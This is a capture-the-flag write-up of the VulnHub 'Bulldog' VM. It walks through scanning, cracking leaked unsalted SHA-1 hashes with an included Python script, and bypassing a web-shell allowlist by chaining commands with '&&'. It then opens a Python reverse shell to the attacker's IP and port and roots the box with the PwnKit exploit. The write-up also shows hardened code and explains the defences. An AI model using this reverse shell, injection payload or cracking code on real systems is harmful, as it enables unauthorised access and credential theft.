CTF : Bulldog

CTF Bulldog writeup. Source VulnHub. Announced difficulty level: Beginner/Intermediate

Posted by Boula-Bytes on 22 February 2022


Information

  • IP: 192.168.0.193
  • MYIP: 192.168.0.36

First enumeration

Basics

  • NMAP

```console
$ sudo nmap -p- -A 192.168.0.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 14:21 CET
Nmap scan report for 192.168.0.193
Host is up (0.00069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
MAC Address: 08:00:27:39:B5:BD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.69 ms 192.168.0.193

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.35 seconds
```

Note that SSH is not on its usual port: it answers on 23/tcp, and both 80 and 8080 serve the same Django application through the Python 2.7 development WSGIServer.
  • Gobuster on port 80

```console
$ gobuster dir -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.193 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.193
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,log,rb,pub,js,php.bak,bak,bkp,tar,id_rsa,json,pl,txt,sql,tgz,rar,py,cgi,zip,sql.bak,tar.gz,xml,sh,csv,html
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/02/22 14:24:13 Starting gobuster in directory enumeration mode
===============================================================
/admin/               (Status: 200) [Size: 1915]
/dev/                 (Status: 200) [Size: 3540]
/robots.txt           (Status: 200) [Size: 1071]
/notice/              (Status: 200) [Size: 1622]
```
  • view-source:http://192.168.0.193/dev/

    ```html
    <!--Need these password hashes for testing. Django's default is too complex-->
    <!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
    Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
    Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
    Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
    Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
    Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
    Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
    Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
    ```

    The comments leak one 40-hex-character hash (SHA-1 length, no salt) per staff member. Looking them up on crackstation.net recovers two of them:

  1. nick:bulldog
  2. sarah:bulldoglover
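Why a lookup site works here: the hashes are plain SHA-1 with no salt, so every guess costs one hash computation and matches against all seven users at once. The script below is an added example written for this writeup, not code from the Bulldog VM or from crackstation; the wordlist and mangling rules are constructed stand-ins for a real wordlist (rockyou.txt, for instance) and a real rule set.

```python
import hashlib
from typing import Dict, Iterable, Iterator, List

# The seven hashes copied from the HTML comments on /dev/, keyed by the local
# part of the e-mail address each one sits next to.
LEAKED: Dict[str, str] = {
    "alan":    "6515229daf8dbdc8b89fed2e60f107433da5f2cb",
    "william": "38882f3b81f8f2bc47d9f3119155b05f954892fb",
    "malik":   "c6f7e34d5d08ba4a40dd5627508ccb55b425e279",
    "kevin":   "0e6ae9fe8af1cd4192865ac97ebf6bda414218a9",
    "ashley":  "553d917a396414ab99785694afd51df3a8a8a3e0",
    "nick":    "ddf45997a7e18a25ad5f5cf222da64814dd060d5",
    "sarah":   "d8b8dd5e7f000b8dea26ef8428caf38c04466b3e",
}

# Constructed stand-in for a real wordlist.
WORDLIST: List[str] = ["password", "123456", "django", "bulldog", "bulldoglover"]


def sha1_hex(password: str) -> str:
    """Unsalted SHA-1 hex digest, the format the /dev/ comments use."""
    return hashlib.sha1(password.encode()).hexdigest()


def mangle(word: str) -> Iterator[str]:
    """A handful of the rewrite rules a cracker applies to every base word."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2017"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {user: cleartext} for every leaked hash hit by wordlist + rules.

    With no salt, one SHA-1 per candidate is compared against every user:
    the hash->users map below is the whole "rainbow table".
    """
    by_hash: Dict[str, List[str]] = {}
    for user, digest in hashes.items():
        by_hash.setdefault(digest.lower(), []).append(user)
    found: Dict[str, str] = {}
    for word in wordlist:
        for candidate in mangle(word):
            for user in by_hash.get(sha1_hex(candidate), []):
                found[user] = candidate
    return found


if __name__ == "__main__":
    for user, cleartext in sorted(crack(LEAKED, WORDLIST).items()):
        print(f"{user}:{cleartext}")
```

Run against LEAKED with the constructed wordlist it should reproduce the two hits crackstation gave the author. The defence is exactly what the developer comment dismissed as "too complex": Django's default PBKDF2 hasher adds a per-user salt (so one guess tests one user) and hundreds of thousands of iterations (so each guess costs far more than one SHA-1).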

Vulnerabilities search

Log in as nick (password bulldog) on http://192.168.0.193/admin/, then open http://192.168.0.193/dev/shell.

The page only accepts commands from an allowlist, but the filter can be bypassed by chaining an arbitrary command after an allowed one with &&.
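To show why the && trick works and what the fix looks like, here is an added example, not the VM's own views.py: a hypothetical allowlist filter that checks only the first word and then hands the whole string to a shell, next to a hardened version that tokenises without a shell, refuses metacharacters and executes an argv list. The allowlist contents are an assumption for illustration.

```python
import shlex
import subprocess
from typing import Dict, Iterable, List, Optional, Tuple

# Hypothetical allowlist in the spirit of the /dev/shell page (assumption,
# not the real Bulldog code).
ALLOWED = {"ifconfig", "ls", "echo", "pwd", "cat", "rm"}

# Characters that give /bin/sh a second thing to do besides the allowed command.
SHELL_META = set("&|;$`<>(){}*?[]~\n")


def vulnerable_run(command: str) -> Optional[str]:
    """Allowlist check on the first word only, then shell=True for the rest.

    'echo hi && echo pwned' passes because the check only sees 'echo', yet
    /bin/sh happily runs both sides of the &&. Returns None when rejected.
    """
    words = command.split()
    if not words or words[0] not in ALLOWED:
        return None
    return subprocess.run(command, shell=True, capture_output=True,
                          text=True).stdout


def hardened_run(command: str) -> Optional[str]:
    """Tokenise with shlex, reject metacharacters, exec argv with shell=False."""
    try:
        argv: List[str] = shlex.split(command)
    except ValueError:          # unbalanced quotes and the like
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if any(ch in SHELL_META for tok in argv for ch in tok):
        return None
    # shell=False: argv goes straight to execve, so even a token like '&&'
    # could only ever be an argument to the allowed program, never an operator.
    return subprocess.run(argv, shell=False, capture_output=True,
                          text=True).stdout


def compare(payloads: Iterable[str]) -> Dict[str, Tuple[bool, bool]]:
    """{payload: (accepted by vulnerable filter?, accepted by hardened filter?)}."""
    return {p: (vulnerable_run(p) is not None, hardened_run(p) is not None)
            for p in payloads}


if __name__ == "__main__":
    for payload, (vuln, hard) in compare([
        "echo hi",
        "echo hi && echo pwned",
        "ls ; id",
        "echo $(id)",
        "id",
    ]).items():
        print(f"{payload!r:26} vulnerable={vuln} hardened={hard}")
```

The first-word check also lets through ; | $( ) and backticks as long as the line starts with an allowed word, so blocking && alone would not help; the real fix is never giving user input to a shell, plus an explicit allowlist on the parsed argv.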

Exploit

Then run this command through the web shell (the ls in front satisfies the allowlist, the sed after && is what actually matters):

```bash
ls && sed -i '19s#^# subprocess.call(command, shell=True)#' bulldog/views.py
```

Now we can run any command :)

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.36",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

And we got a shell :)

Privilege escalation

Enumeration for privesc

Tired, so PwnKit...

Exploit

Upload the PwnKit (CVE-2021-4034) Python exploit to the box and run it:

```console
$ python3 CVE-2021-4034.py
# whoami
root
# cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?
Let me know what you thought on twitter, I'm @frichette_n

As far as I know there are two ways to get root. Can you find the other one?

Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!
#
```

\o/